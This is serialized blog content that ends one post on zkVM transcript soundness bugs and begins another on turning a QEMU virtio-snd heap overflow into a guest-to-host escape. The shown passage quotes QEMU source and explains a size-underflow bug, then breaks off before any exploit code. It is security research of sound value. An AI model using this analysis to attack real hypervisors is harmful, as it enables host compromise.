binding.",{"type":25,"tag":38,"props":127517,"children":127518},{},[127519],{"type":31,"value":127520},"We found six instances by examining a handful of systems. How many more exist in the dozens of zkVMs, proof systems, and recursive verifiers deployed today?",{"type":25,"tag":38,"props":127522,"children":127523},{},[127524,127529],{"type":25,"tag":9273,"props":127525,"children":127526},{},[127527],{"type":31,"value":127528},"For auditors:",{"type":31,"value":127530}," Draw the data flow. Trace the transcript. Check every prover-controlled value against when its relevant challenges are derived.",{"type":25,"tag":38,"props":127532,"children":127533},{},[127534,127539],{"type":25,"tag":9273,"props":127535,"children":127536},{},[127537],{"type":31,"value":127538},"For builders:",{"type":31,"value":127540}," Treat the transcript as a sacred ledger. When in doubt, absorb it.",{"type":25,"tag":9316,"props":127542,"children":127543},{},[127544],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":127546},[127547,127548,127551,127557,127558,127566,127572,127575,127576,127580],{"id":111869,"depth":6769,"text":111872},{"id":112011,"depth":6769,"text":112014,"children":127549},[127550],{"id":112017,"depth":6778,"text":112020},{"id":112446,"depth":6769,"text":112449,"children":127552},[127553,127554,127555,127556],{"id":112457,"depth":6778,"text":112460},{"id":112645,"depth":6778,"text":112648},{"id":116013,"depth":6778,"text":116016},{"id":117225,"depth":6778,"text":117228},{"id":118856,"depth":6769,"text":118859},{"id":119361,"depth":6769,"text":119364,"children":127559},[127560,127561,127562,127563,127564,127565],{"id":119383,"depth":6778,"text":119386},{"id":120708,"depth":6778,"text":111824},{"id":121844,"depth":6778,"text":121847},{"id":122512,"depth":6778,"text":122515},{"id":125168,"depth":6778,"text":125171},{"id":125722,"depth":6778,"text":111848},{"id":126649,"depth":6769,"text":126652,"children":127567},[127568,127569,127570,127571],{"id":126660,"depth":6778,"text":126663},{"id":126828,"depth":6778,"text":126831},{"id":126852,"depth":6778,"text":126855},{"id":126868,"depth":6778,"text":126871},{"id":126882,"depth":6769,"text":126885,"children":127573},[127574],{"id":126888,"depth":6778,"text":126891},{"id":126922,"depth":6769,"text":126925},{"id":127099,"depth":6769,"text":111861,"children":127577},[127578,127579],{"id":127432,"depth":6778,"text":111818},{"id":127461,"depth":6778,"text":111824},{"id":127492,"depth":6769,"text":127495},"content:blog:2026-03-03-zkvms-unfaithful-claims.md","blog/2026-03-03-zkvms-unfaithful-claims.md","blog/2026-03-03-zkvms-unfaithful-claims",{"_path":127585,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":127586,"description":127587,"date":127588,"author":127589,"image":127590,"isFeatured":16,"onBlogPage":16,"tags":127592,"body":127595,"_type":6798,"_id":135881,"_source":6800,"_file":135882,"_stem":135883,"_extension":6803},"/blog/2026-03-17-virtio-snd-qemu-hypervisor-escape","From virtio-snd 0-Day to Hypervisor Escape: Exploiting QEMU with an Uncontrolled Heap Overflow","Turning an uncontrolled heap overflow into a reliable QEMU guest-to-host escape using new glibc allocator behavior and QEMU-specific heap spray techniques.","2026-03-17T12:00:00.000Z","hrvoje",{"src":127591,"width":101226,"height":17580},"/posts/virtio-snd-qemu-0day/title.png",[127593,127594],"qemu","heap-overflow",{"type":22,"children":127596,"toc":135863},[127597,127602,127607,127612,127618,127623,127628,127636,127642,127654,127658,127663,127671,127676,127682,127687,127700,128310,128345,128390,128424,128459,128594,128642,128648,128653,129409,129454,129490,129525,129590,129610,130060,130107,130110,130115,130180,130206,130228,130232,130237,130242,130248,130253,130258,130263,130269,130282,130288,130293,130301,130371,130376,130382,130395,130621,130684,130703,131086,131091,131124,131129,131405,131417,131435,131714,131726,131729,131764,131769,131775,131787,131799,131804,131809,131819,131854,132471,132503,132514,132550,132563,132569,132581,132589,132615,132620,132653,132694,132700,132719,132757,132765,132814,132819,132868,132873,132881,132968,132974,133013,133025,133033,133051,133070,133078,133090,133098,133117,133125,133136,133144,133155,133163,133176,133184,133190,133195,133208,133216,133234,133242,133254,133259,133267,133303,133336,133343,133377,133385,133390,133396,133408,133419,133698,133758,133826,133834,133868,134472,134483,134491,134497,134502,134513,135267,135300,135312,135398,135418,135627,135674,135686,135692,135711,135737,135765,135781,135808,135811,135831,135845,135849,135854,135859],{"type":25,"tag":38,"props":127598,"children":127599},{},[127600],{"type":31,"value":127601},"Heap overflows are often exploitable, but far less so when the corrupted bytes are not under your control. In many cases, that kind of bug is written off as a crash and nothing more. However, in this post we show how we turned such an overflow into a reliable QEMU guest-to-host escape by abusing new glibc allocator behavior and QEMU-specific heap spray techniques.",{"type":25,"tag":26,"props":127603,"children":127604},{"id":127593},[127605],{"type":31,"value":127606},"QEMU",{"type":25,"tag":38,"props":127608,"children":127609},{},[127610],{"type":31,"value":127611},"QEMU is a machine emulator and virtualizer that lets a host system run guest operating systems. It presents the guest with virtual hardware, while the logic backing that hardware runs inside the host-side QEMU process.",{"type":25,"tag":606,"props":127613,"children":127615},{"id":127614},"virtio-devices",[127616],{"type":31,"value":127617},"Virtio Devices",{"type":25,"tag":38,"props":127619,"children":127620},{},[127621],{"type":31,"value":127622},"For guest-to-host escape research, the interesting part of QEMU is the interface between the guest and those host-side device implementations. Every request sent by the guest is eventually parsed and handled by code running in the QEMU process. This is interesting because any unhandled edge case in the device could lead to some kind of host state corruption.",{"type":25,"tag":38,"props":127624,"children":127625},{},[127626],{"type":31,"value":127627},"At a high level, the communication between the driver running in the guest and the device running on the host is simple - the guest-side virtio driver shares requests over virtqueues, while the host-side virtio device consumes those requests, processes and returns responses.",{"type":25,"tag":38,"props":127629,"children":127630},{},[127631],{"type":25,"tag":6467,"props":127632,"children":127635},{"alt":127633,"src":127634},"flowchart1","/posts/virtio-snd-qemu-0day/flowchart1.png",[],{"type":25,"tag":26,"props":127637,"children":127639},{"id":127638},"finding-a-bug",[127640],{"type":31,"value":127641},"Finding a Bug",{"type":25,"tag":38,"props":127643,"children":127644},{},[127645,127647,127653],{"type":31,"value":127646},"While looking for devices to research, we focused on ones that seemed to have received less scrutiny in the past. With that in mind, we started with the sound device ",{"type":25,"tag":82,"props":127648,"children":127650},{"className":127649},[],[127651],{"type":31,"value":127652},"virtio-snd",{"type":31,"value":179},{"type":25,"tag":606,"props":127655,"children":127656},{"id":127652},[127657],{"type":31,"value":127652},{"type":25,"tag":38,"props":127659,"children":127660},{},[127661],{"type":31,"value":127662},"From the official documentation:",{"type":25,"tag":34,"props":127664,"children":127665},{},[127666],{"type":25,"tag":38,"props":127667,"children":127668},{},[127669],{"type":31,"value":127670},"Virtio sound implements capture and playback from inside a guest using the configured audio backend of the host machine.",{"type":25,"tag":38,"props":127672,"children":127673},{},[127674],{"type":31,"value":127675},"Essentially, it allows software running inside the guest to interact with the host's audio stack through a paravirtualized sound device. Playback streams send guest-provided audio data to the host backend, while capture streams let the guest receive audio input from the host.",{"type":25,"tag":630,"props":127677,"children":127679},{"id":127678},"audio-data-buffers",[127680],{"type":31,"value":127681},"Audio Data Buffers",{"type":25,"tag":38,"props":127683,"children":127684},{},[127685],{"type":31,"value":127686},"This audio data flows through buffers allocated by the host-side virtio-snd device and stored in a FIFO linked list for the corresponding stream.",{"type":25,"tag":38,"props":127688,"children":127689},{},[127690,127692,127698],{"type":31,"value":127691},"For example, the following is ",{"type":25,"tag":82,"props":127693,"children":127695},{"className":127694},[],[127696],{"type":31,"value":127697},"virtio_snd_handle_rx_xfer",{"type":31,"value":127699},", which is responsible for allocating buffers for an input audio stream:",{"type":25,"tag":206,"props":127701,"children":127703},{"code":127702,"language":2254,"meta":7,"className":20473,"style":7},"/*\n * The rx virtqueue handler. Makes the buffers available to their\n * respective streams for consumption.\n *\n * @vdev: VirtIOSound device\n * @vq: rx virtqueue\n */\nstatic void virtio_snd_handle_rx_xfer(VirtIODevice *vdev, VirtQueue *vq)\n{\n    VirtQueueElement *elem;\n    [...]\n\n    for (;;) {\n        VirtIOSoundPCMStream *stream;\n\n        elem = virtqueue_pop(vq, sizeof(VirtQueueElement));     // [1]\n        if (!elem) {\n            break;\n        }\n\n        [...]\n\n        WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {\n            size = iov_size(elem->in_sg, elem->in_num) -\n                sizeof(virtio_snd_pcm_status);                  // [2]\n            buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);\n            buffer->elem = elem;\n            buffer->vq = vq;\n            buffer->size = 0;\n            buffer->offset = 0;\n            QSIMPLEQ_INSERT_TAIL(&stream->queue, buffer, entry); // [3]\n        }\n        continue;\n\n        [...]\n}\n\n",[127704],{"type":25,"tag":82,"props":127705,"children":127706},{"__ignoreMap":7},[127707,127714,127722,127730,127737,127745,127753,127761,127809,127816,127833,127840,127847,127859,127876,127883,127919,127939,127950,127957,127964,127972,127979,128012,128071,128089,128128,128153,128177,128205,128232,128270,128277,128289,128296,128303],{"type":25,"tag":216,"props":127708,"children":127709},{"class":6922,"line":6923},[127710],{"type":25,"tag":216,"props":127711,"children":127712},{"style":6927},[127713],{"type":31,"value":53335},{"type":25,"tag":216,"props":127715,"children":127716},{"class":6922,"line":6769},[127717],{"type":25,"tag":216,"props":127718,"children":127719},{"style":6927},[127720],{"type":31,"value":127721}," * The rx virtqueue handler. Makes the buffers available to their\n",{"type":25,"tag":216,"props":127723,"children":127724},{"class":6922,"line":6778},[127725],{"type":25,"tag":216,"props":127726,"children":127727},{"style":6927},[127728],{"type":31,"value":127729}," * respective streams for consumption.\n",{"type":25,"tag":216,"props":127731,"children":127732},{"class":6922,"line":7005},[127733],{"type":25,"tag":216,"props":127734,"children":127735},{"style":6927},[127736],{"type":31,"value":23448},{"type":25,"tag":216,"props":127738,"children":127739},{"class":6922,"line":7110},[127740],{"type":25,"tag":216,"props":127741,"children":127742},{"style":6927},[127743],{"type":31,"value":127744}," * @vdev: VirtIOSound device\n",{"type":25,"tag":216,"props":127746,"children":127747},{"class":6922,"line":7216},[127748],{"type":25,"tag":216,"props":127749,"children":127750},{"style":6927},[127751],{"type":31,"value":127752}," * @vq: rx virtqueue\n",{"type":25,"tag":216,"props":127754,"children":127755},{"class":6922,"line":7244},[127756],{"type":25,"tag":216,"props":127757,"children":127758},{"style":6927},[127759],{"type":31,"value":127760}," */\n",{"type":25,"tag":216,"props":127762,"children":127763},{"class":6922,"line":7257},[127764,127768,127772,127777,127782,127786,127791,127796,127800,127805],{"type":25,"tag":216,"props":127765,"children":127766},{"style":6936},[127767],{"type":31,"value":55013},{"type":25,"tag":216,"props":127769,"children":127770},{"style":6936},[127771],{"type":31,"value":55018},{"type":25,"tag":216,"props":127773,"children":127774},{"style":7047},[127775],{"type":31,"value":127776}," virtio_snd_handle_rx_xfer",{"type":25,"tag":216,"props":127778,"children":127779},{"style":6964},[127780],{"type":31,"value":127781},"(VirtIODevice ",{"type":25,"tag":216,"props":127783,"children":127784},{"style":6953},[127785],{"type":31,"value":8519},{"type":25,"tag":216,"props":127787,"children":127788},{"style":6947},[127789],{"type":31,"value":127790},"vdev",{"type":25,"tag":216,"props":127792,"children":127793},{"style":6964},[127794],{"type":31,"value":127795},", VirtQueue ",{"type":25,"tag":216,"props":127797,"children":127798},{"style":6953},[127799],{"type":31,"value":8519},{"type":25,"tag":216,"props":127801,"children":127802},{"style":6947},[127803],{"type":31,"value":127804},"vq",{"type":25,"tag":216,"props":127806,"children":127807},{"style":6964},[127808],{"type":31,"value":7107},{"type":25,"tag":216,"props":127810,"children":127811},{"class":6922,"line":7275},[127812],{"type":25,"tag":216,"props":127813,"children":127814},{"style":6964},[127815],{"type":31,"value":14836},{"type":25,"tag":216,"props":127817,"children":127818},{"class":6922,"line":7296},[127819,127824,127828],{"type":25,"tag":216,"props":127820,"children":127821},{"style":6964},[127822],{"type":31,"value":127823},"    VirtQueueElement ",{"type":25,"tag":216,"props":127825,"children":127826},{"style":6953},[127827],{"type":31,"value":8519},{"type":25,"tag":216,"props":127829,"children":127830},{"style":6964},[127831],{"type":31,"value":127832},"elem;\n",{"type":25,"tag":216,"props":127834,"children":127835},{"class":6922,"line":7305},[127836],{"type":25,"tag":216,"props":127837,"children":127838},{"style":6964},[127839],{"type":31,"value":108759},{"type":25,"tag":216,"props":127841,"children":127842},{"class":6922,"line":7557},[127843],{"type":25,"tag":216,"props":127844,"children":127845},{"emptyLinePlaceholder":16},[127846],{"type":31,"value":7642},{"type":25,"tag":216,"props":127848,"children":127849},{"class":6922,"line":7574},[127850,127854],{"type":25,"tag":216,"props":127851,"children":127852},{"style":6973},[127853],{"type":31,"value":6976},{"type":25,"tag":216,"props":127855,"children":127856},{"style":6964},[127857],{"type":31,"value":127858}," (;;) {\n",{"type":25,"tag":216,"props":127860,"children":127861},{"class":6922,"line":7591},[127862,127867,127871],{"type":25,"tag":216,"props":127863,"children":127864},{"style":6964},[127865],{"type":31,"value":127866},"        VirtIOSoundPCMStream ",{"type":25,"tag":216,"props":127868,"children":127869},{"style":6953},[127870],{"type":31,"value":8519},{"type":25,"tag":216,"props":127872,"children":127873},{"style":6964},[127874],{"type":31,"value":127875},"stream;\n",{"type":25,"tag":216,"props":127877,"children":127878},{"class":6922,"line":7604},[127879],{"type":25,"tag":216,"props":127880,"children":127881},{"emptyLinePlaceholder":16},[127882],{"type":31,"value":7642},{"type":25,"tag":216,"props":127884,"children":127885},{"class":6922,"line":7613},[127886,127891,127895,127900,127905,127909,127914],{"type":25,"tag":216,"props":127887,"children":127888},{"style":6964},[127889],{"type":31,"value":127890},"        elem ",{"type":25,"tag":216,"props":127892,"children":127893},{"style":6953},[127894],{"type":31,"value":266},{"type":25,"tag":216,"props":127896,"children":127897},{"style":7047},[127898],{"type":31,"value":127899}," virtqueue_pop",{"type":25,"tag":216,"props":127901,"children":127902},{"style":6964},[127903],{"type":31,"value":127904},"(vq, ",{"type":25,"tag":216,"props":127906,"children":127907},{"style":6936},[127908],{"type":31,"value":59296},{"type":25,"tag":216,"props":127910,"children":127911},{"style":6964},[127912],{"type":31,"value":127913},"(VirtQueueElement));",{"type":25,"tag":216,"props":127915,"children":127916},{"style":6927},[127917],{"type":31,"value":127918},"     // [1]\n",{"type":25,"tag":216,"props":127920,"children":127921},{"class":6922,"line":7636},[127922,127926,127930,127934],{"type":25,"tag":216,"props":127923,"children":127924},{"style":6973},[127925],{"type":31,"value":7222},{"type":25,"tag":216,"props":127927,"children":127928},{"style":6964},[127929],{"type":31,"value":7016},{"type":25,"tag":216,"props":127931,"children":127932},{"style":6953},[127933],{"type":31,"value":24581},{"type":25,"tag":216,"props":127935,"children":127936},{"style":6964},[127937],{"type":31,"value":127938},"elem) {\n",{"type":25,"tag":216,"props":127940,"children":127941},{"class":6922,"line":7645},[127942,127946],{"type":25,"tag":216,"props":127943,"children":127944},{"style":6973},[127945],{"type":31,"value":7250},{"type":25,"tag":216,"props":127947,"children":127948},{"style":6964},[127949],{"type":31,"value":6967},{"type":25,"tag":216,"props":127951,"children":127952},{"class":6922,"line":7654},[127953],{"type":25,"tag":216,"props":127954,"children":127955},{"style":6964},[127956],{"type":31,"value":7302},{"type":25,"tag":216,"props":127958,"children":127959},{"class":6922,"line":7722},[127960],{"type":25,"tag":216,"props":127961,"children":127962},{"emptyLinePlaceholder":16},[127963],{"type":31,"value":7642},{"type":25,"tag":216,"props":127965,"children":127966},{"class":6922,"line":7730},[127967],{"type":25,"tag":216,"props":127968,"children":127969},{"style":6964},[127970],{"type":31,"value":127971},"        [...]\n",{"type":25,"tag":216,"props":127973,"children":127974},{"class":6922,"line":7760},[127975],{"type":25,"tag":216,"props":127976,"children":127977},{"emptyLinePlaceholder":16},[127978],{"type":31,"value":7642},{"type":25,"tag":216,"props":127980,"children":127981},{"class":6922,"line":7768},[127982,127987,127991,127995,127999,128003,128008],{"type":25,"tag":216,"props":127983,"children":127984},{"style":7047},[127985],{"type":31,"value":127986},"        WITH_QEMU_LOCK_GUARD",{"type":25,"tag":216,"props":127988,"children":127989},{"style":6964},[127990],{"type":31,"value":1850},{"type":25,"tag":216,"props":127992,"children":127993},{"style":6953},[127994],{"type":31,"value":7059},{"type":25,"tag":216,"props":127996,"children":127997},{"style":6947},[127998],{"type":31,"value":40224},{"type":25,"tag":216,"props":128000,"children":128001},{"style":6964},[128002],{"type":31,"value":17714},{"type":25,"tag":216,"props":128004,"children":128005},{"style":6947},[128006],{"type":31,"value":128007},"queue_mutex",{"type":25,"tag":216,"props":128009,"children":128010},{"style":6964},[128011],{"type":31,"value":18761},{"type":25,"tag":216,"props":128013,"children":128014},{"class":6922,"line":7800},[128015,128020,128024,128029,128033,128037,128041,128046,128050,128054,128058,128063,128067],{"type":25,"tag":216,"props":128016,"children":128017},{"style":6964},[128018],{"type":31,"value":128019},"            size ",{"type":25,"tag":216,"props":128021,"children":128022},{"style":6953},[128023],{"type":31,"value":266},{"type":25,"tag":216,"props":128025,"children":128026},{"style":7047},[128027],{"type":31,"value":128028}," iov_size",{"type":25,"tag":216,"props":128030,"children":128031},{"style":6964},[128032],{"type":31,"value":1850},{"type":25,"tag":216,"props":128034,"children":128035},{"style":6947},[128036],{"type":31,"value":56032},{"type":25,"tag":216,"props":128038,"children":128039},{"style":6964},[128040],{"type":31,"value":17714},{"type":25,"tag":216,"props":128042,"children":128043},{"style":6947},[128044],{"type":31,"value":128045},"in_sg",{"type":25,"tag":216,"props":128047,"children":128048},{"style":6964},[128049],{"type":31,"value":7026},{"type":25,"tag":216,"props":128051,"children":128052},{"style":6947},[128053],{"type":31,"value":56032},{"type":25,"tag":216,"props":128055,"children":128056},{"style":6964},[128057],{"type":31,"value":17714},{"type":25,"tag":216,"props":128059,"children":128060},{"style":6947},[128061],{"type":31,"value":128062},"in_num",{"type":25,"tag":216,"props":128064,"children":128065},{"style":6964},[128066],{"type":31,"value":7036},{"type":25,"tag":216,"props":128068,"children":128069},{"style":6953},[128070],{"type":31,"value":54830},{"type":25,"tag":216,"props":128072,"children":128073},{"class":6922,"line":7808},[128074,128079,128084],{"type":25,"tag":216,"props":128075,"children":128076},{"style":6936},[128077],{"type":31,"value":128078},"                sizeof",{"type":25,"tag":216,"props":128080,"children":128081},{"style":6964},[128082],{"type":31,"value":128083},"(virtio_snd_pcm_status);",{"type":25,"tag":216,"props":128085,"children":128086},{"style":6927},[128087],{"type":31,"value":128088},"                  // [2]\n",{"type":25,"tag":216,"props":128090,"children":128091},{"class":6922,"line":7868},[128092,128097,128101,128106,128110,128114,128119,128123],{"type":25,"tag":216,"props":128093,"children":128094},{"style":6964},[128095],{"type":31,"value":128096},"            buffer ",{"type":25,"tag":216,"props":128098,"children":128099},{"style":6953},[128100],{"type":31,"value":266},{"type":25,"tag":216,"props":128102,"children":128103},{"style":7047},[128104],{"type":31,"value":128105}," g_malloc0",{"type":25,"tag":216,"props":128107,"children":128108},{"style":6964},[128109],{"type":31,"value":1850},{"type":25,"tag":216,"props":128111,"children":128112},{"style":6936},[128113],{"type":31,"value":59296},{"type":25,"tag":216,"props":128115,"children":128116},{"style":6964},[128117],{"type":31,"value":128118},"(VirtIOSoundPCMBuffer) ",{"type":25,"tag":216,"props":128120,"children":128121},{"style":6953},[128122],{"type":31,"value":3539},{"type":25,"tag":216,"props":128124,"children":128125},{"style":6964},[128126],{"type":31,"value":128127}," size);\n",{"type":25,"tag":216,"props":128129,"children":128130},{"class":6922,"line":13001},[128131,128136,128140,128144,128148],{"type":25,"tag":216,"props":128132,"children":128133},{"style":6947},[128134],{"type":31,"value":128135},"            buffer",{"type":25,"tag":216,"props":128137,"children":128138},{"style":6964},[128139],{"type":31,"value":17714},{"type":25,"tag":216,"props":128141,"children":128142},{"style":6947},[128143],{"type":31,"value":56032},{"type":25,"tag":216,"props":128145,"children":128146},{"style":6953},[128147],{"type":31,"value":6956},{"type":25,"tag":216,"props":128149,"children":128150},{"style":6964},[128151],{"type":31,"value":128152}," elem;\n",{"type":25,"tag":216,"props":128154,"children":128155},{"class":6922,"line":13019},[128156,128160,128164,128168,128172],{"type":25,"tag":216,"props":128157,"children":128158},{"style":6947},[128159],{"type":31,"value":128135},{"type":25,"tag":216,"props":128161,"children":128162},{"style":6964},[128163],{"type":31,"value":17714},{"type":25,"tag":216,"props":128165,"children":128166},{"style":6947},[128167],{"type":31,"value":127804},{"type":25,"tag":216,"props":128169,"children":128170},{"style":6953},[128171],{"type":31,"value":6956},{"type":25,"tag":216,"props":128173,"children":128174},{"style":6964},[128175],{"type":31,"value":128176}," vq;\n",{"type":25,"tag":216,"props":128178,"children":128179},{"class":6922,"line":13064},[128180,128184,128188,128193,128197,128201],{"type":25,"tag":216,"props":128181,"children":128182},{"style":6947},[128183],{"type":31,"value":128135},{"type":25,"tag":216,"props":128185,"children":128186},{"style":6964},[128187],{"type":31,"value":17714},{"type":25,"tag":216,"props":128189,"children":128190},{"style":6947},[128191],{"type":31,"value":128192},"size",{"type":25,"tag":216,"props":128194,"children":128195},{"style":6953},[128196],{"type":31,"value":6956},{"type":25,"tag":216,"props":128198,"children":128199},{"style":6989},[128200],{"type":31,"value":6992},{"type":25,"tag":216,"props":128202,"children":128203},{"style":6964},[128204],{"type":31,"value":6967},{"type":25,"tag":216,"props":128206,"children":128207},{"class":6922,"line":13170},[128208,128212,128216,128220,128224,128228],{"type":25,"tag":216,"props":128209,"children":128210},{"style":6947},[128211],{"type":31,"value":128135},{"type":25,"tag":216,"props":128213,"children":128214},{"style":6964},[128215],{"type":31,"value":17714},{"type":25,"tag":216,"props":128217,"children":128218},{"style":6947},[128219],{"type":31,"value":17858},{"type":25,"tag":216,"props":128221,"children":128222},{"style":6953},[128223],{"type":31,"value":6956},{"type":25,"tag":216,"props":128225,"children":128226},{"style":6989},[128227],{"type":31,"value":6992},{"type":25,"tag":216,"props":128229,"children":128230},{"style":6964},[128231],{"type":31,"value":6967},{"type":25,"tag":216,"props":128233,"children":128234},{"class":6922,"line":27455},[128235,128240,128244,128248,128252,128256,128261,128266],{"type":25,"tag":216,"props":128236,"children":128237},{"style":7047},[128238],{"type":31,"value":128239},"            QSIMPLEQ_INSERT_TAIL",{"type":25,"tag":216,"props":128241,"children":128242},{"style":6964},[128243],{"type":31,"value":1850},{"type":25,"tag":216,"props":128245,"children":128246},{"style":6953},[128247],{"type":31,"value":7059},{"type":25,"tag":216,"props":128249,"children":128250},{"style":6947},[128251],{"type":31,"value":40224},{"type":25,"tag":216,"props":128253,"children":128254},{"style":6964},[128255],{"type":31,"value":17714},{"type":25,"tag":216,"props":128257,"children":128258},{"style":6947},[128259],{"type":31,"value":128260},"queue",{"type":25,"tag":216,"props":128262,"children":128263},{"style":6964},[128264],{"type":31,"value":128265},", buffer, entry);",{"type":25,"tag":216,"props":128267,"children":128268},{"style":6927},[128269],{"type":31,"value":56597},{"type":25,"tag":216,"props":128271,"children":128272},{"class":6922,"line":27490},[128273],{"type":25,"tag":216,"props":128274,"children":128275},{"style":6964},[128276],{"type":31,"value":7302},{"type":25,"tag":216,"props":128278,"children":128279},{"class":6922,"line":27498},[128280,128285],{"type":25,"tag":216,"props":128281,"children":128282},{"style":6973},[128283],{"type":31,"value":128284},"        continue",{"type":25,"tag":216,"props":128286,"children":128287},{"style":6964},[128288],{"type":31,"value":6967},{"type":25,"tag":216,"props":128290,"children":128291},{"class":6922,"line":27506},[128292],{"type":25,"tag":216,"props":128293,"children":128294},{"emptyLinePlaceholder":16},[128295],{"type":31,"value":7642},{"type":25,"tag":216,"props":128297,"children":128298},{"class":6922,"line":27515},[128299],{"type":25,"tag":216,"props":128300,"children":128301},{"style":6964},[128302],{"type":31,"value":127971},{"type":25,"tag":216,"props":128304,"children":128305},{"class":6922,"line":27557},[128306],{"type":25,"tag":216,"props":128307,"children":128308},{"style":6964},[128309],{"type":31,"value":7874},{"type":25,"tag":38,"props":128311,"children":128312},{},[128313,128315,128321,128323,128329,128331,128336,128337,128343],{"type":31,"value":128314},"At ",{"type":25,"tag":82,"props":128316,"children":128318},{"className":128317},[],[128319],{"type":31,"value":128320},"[1]",{"type":31,"value":128322},", a ",{"type":25,"tag":82,"props":128324,"children":128326},{"className":128325},[],[128327],{"type":31,"value":128328},"VirtQueueElement *elem",{"type":31,"value":128330}," is popped from the virtqueue. It contains the ",{"type":25,"tag":82,"props":128332,"children":128334},{"className":128333},[],[128335],{"type":31,"value":128045},{"type":31,"value":1307},{"type":25,"tag":82,"props":128338,"children":128340},{"className":128339},[],[128341],{"type":31,"value":128342},"out_sg",{"type":31,"value":128344}," iovecs that describe the guest request, and is therefore fully guest-controlled.",{"type":25,"tag":38,"props":128346,"children":128347},{},[128348,128350,128356,128358,128364,128366,128372,128374,128380,128382,128388],{"type":31,"value":128349},"Further at ",{"type":25,"tag":82,"props":128351,"children":128353},{"className":128352},[],[128354],{"type":31,"value":128355},"[2]",{"type":31,"value":128357},", the device computes the size of the data buffer as ",{"type":25,"tag":82,"props":128359,"children":128361},{"className":128360},[],[128362],{"type":31,"value":128363},"iov_size(elem->in_sg, elem->in_num) - sizeof(virtio_snd_pcm_status)",{"type":31,"value":128365},". That value is then used in the allocation: ",{"type":25,"tag":82,"props":128367,"children":128369},{"className":128368},[],[128370],{"type":31,"value":128371},"g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size)",{"type":31,"value":128373},". Finally, at ",{"type":25,"tag":82,"props":128375,"children":128377},{"className":128376},[],[128378],{"type":31,"value":128379},"[3]",{"type":31,"value":128381},", the newly allocated buffer is appended to the ",{"type":25,"tag":82,"props":128383,"children":128385},{"className":128384},[],[128386],{"type":31,"value":128387},"stream->queue",{"type":31,"value":128389}," linked list.",{"type":25,"tag":38,"props":128391,"children":128392},{},[128393,128395,128400,128402,128407,128409,128414,128416,128422],{"type":31,"value":128394},"Because both the ",{"type":25,"tag":82,"props":128396,"children":128398},{"className":128397},[],[128399],{"type":31,"value":128045},{"type":31,"value":128401}," iovec and the ",{"type":25,"tag":82,"props":128403,"children":128405},{"className":128404},[],[128406],{"type":31,"value":128062},{"type":31,"value":128408}," field are guest-controlled, and there is no check that the total ",{"type":25,"tag":82,"props":128410,"children":128412},{"className":128411},[],[128413],{"type":31,"value":128045},{"type":31,"value":128415}," size is at least ",{"type":25,"tag":82,"props":128417,"children":128419},{"className":128418},[],[128420],{"type":31,"value":128421},"sizeof(virtio_snd_pcm_status)",{"type":31,"value":128423},", this calculation can underflow if the guest provides a smaller input buffer - that gives us our first bug.",{"type":25,"tag":38,"props":128425,"children":128426},{},[128427,128429,128434,128436,128442,128444,128450,128452,128458],{"type":31,"value":128428},"From the guest driver, we can provide an empty ",{"type":25,"tag":82,"props":128430,"children":128432},{"className":128431},[],[128433],{"type":31,"value":128045},{"type":31,"value":128435}," iovec. In that case, the calculation becomes ",{"type":25,"tag":82,"props":128437,"children":128439},{"className":128438},[],[128440],{"type":31,"value":128441},"0 - sizeof(virtio_snd_pcm_status)",{"type":31,"value":128443},", so the allocation size effectively becomes ",{"type":25,"tag":82,"props":128445,"children":128447},{"className":128446},[],[128448],{"type":31,"value":128449},"sizeof(VirtIOSoundPCMBuffer) - 8",{"type":31,"value":128451},". Given the definition of ",{"type":25,"tag":82,"props":128453,"children":128455},{"className":128454},[],[128456],{"type":31,"value":128457},"VirtIOSoundPCMBuffer",{"type":31,"value":1472},{"type":25,"tag":206,"props":128460,"children":128462},{"code":128461,"language":2254,"meta":7,"className":20473,"style":7},"struct VirtIOSoundPCMBuffer {\n    QSIMPLEQ_ENTRY(VirtIOSoundPCMBuffer) entry;\n    VirtQueueElement *elem;\n    VirtQueue *vq;\n    size_t size;\n    uint64_t offset;\n    /* Used for the TX queue for lazy I/O copy from `elem` */\n    bool populated;\n    uint8_t data[];\n};\n",[128463],{"type":25,"tag":82,"props":128464,"children":128465},{"__ignoreMap":7},[128466,128478,128491,128506,128523,128535,128547,128555,128567,128587],{"type":25,"tag":216,"props":128467,"children":128468},{"class":6922,"line":6923},[128469,128473],{"type":25,"tag":216,"props":128470,"children":128471},{"style":6936},[128472],{"type":31,"value":13357},{"type":25,"tag":216,"props":128474,"children":128475},{"style":6964},[128476],{"type":31,"value":128477}," VirtIOSoundPCMBuffer {\n",{"type":25,"tag":216,"props":128479,"children":128480},{"class":6922,"line":6769},[128481,128486],{"type":25,"tag":216,"props":128482,"children":128483},{"style":7047},[128484],{"type":31,"value":128485},"    QSIMPLEQ_ENTRY",{"type":25,"tag":216,"props":128487,"children":128488},{"style":6964},[128489],{"type":31,"value":128490},"(VirtIOSoundPCMBuffer) entry;\n",{"type":25,"tag":216,"props":128492,"children":128493},{"class":6922,"line":6778},[128494,128498,128502],{"type":25,"tag":216,"props":128495,"children":128496},{"style":6964},[128497],{"type":31,"value":127823},{"type":25,"tag":216,"props":128499,"children":128500},{"style":6953},[128501],{"type":31,"value":8519},{"type":25,"tag":216,"props":128503,"children":128504},{"style":6964},[128505],{"type":31,"value":127832},{"type":25,"tag":216,"props":128507,"children":128508},{"class":6922,"line":7005},[128509,128514,128518],{"type":25,"tag":216,"props":128510,"children":128511},{"style":6964},[128512],{"type":31,"value":128513},"    VirtQueue ",{"type":25,"tag":216,"props":128515,"children":128516},{"style":6953},[128517],{"type":31,"value":8519},{"type":25,"tag":216,"props":128519,"children":128520},{"style":6964},[128521],{"type":31,"value":128522},"vq;\n",{"type":25,"tag":216,"props":128524,"children":128525},{"class":6922,"line":7110},[128526,128530],{"type":25,"tag":216,"props":128527,"children":128528},{"style":6936},[128529],{"type":31,"value":20523},{"type":25,"tag":216,"props":128531,"children":128532},{"style":6964},[128533],{"type":31,"value":128534}," size;\n",{"type":25,"tag":216,"props":128536,"children":128537},{"class":6922,"line":7216},[128538,128542],{"type":25,"tag":216,"props":128539,"children":128540},{"style":6936},[128541],{"type":31,"value":59581},{"type":25,"tag":216,"props":128543,"children":128544},{"style":6964},[128545],{"type":31,"value":128546}," 